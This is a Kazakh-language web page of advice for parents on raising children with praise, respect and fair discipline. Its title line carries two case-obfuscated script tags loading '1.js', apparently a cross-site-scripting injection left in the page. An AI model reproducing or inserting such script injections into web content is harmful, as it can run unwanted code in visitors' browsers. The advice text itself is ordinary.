Ата-аналарға кеңес<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.01.2021
Ата-аналарға кеңес
- Кез келген бала – мейлі, ол үздік оқи ма, нашар оқи ма, шалт қимылды ма, не болмаса сылбыр ма, атлет пе, бос белбеу ме, бәрібір – сүюге, құрметтеуге лайық.
- Есіңізде болсын, бала болмысы бірыңғай кемшіліктерден тұрмайды. Көре білсе оның бойында қастерлі құндылықтар жетеді, тек соларды дер кезінде танып, дамыта білу қажет.
- Мақтауға сараң болмаңыз. Орындаушыны мақтап, орындалған істі ғана сынау қажет. Мақтағанда адресін нақты айтып, сынағанда адрессіз сынау керек.
- Талаптарды күшейтудің қандай түрін болсын, мақтаудан бастау қажет. Мейлі, несиеге болса да.
- Баланың алдына қолынан келетін ғана міндеттерді қойыңыз.
- Бұйрық бергеннің орнына кеңес немесе көмек сұраңыз. Терезесі тең кісілердей сөйлесіңіз.
- Рұқсат етудің тыйым салудан гөрі тәлімі молырақ болады.
- Бір қателікке бола екі рет жазалауға болмайды. Бала өзін не үшін және неге жазаланғанын түсінуі тиіс.
- Көп жағдайда ескертпе жасау, тыйып тастау, талап ету артық. Бұған көз жеткізіңіз.
Просмотров: 273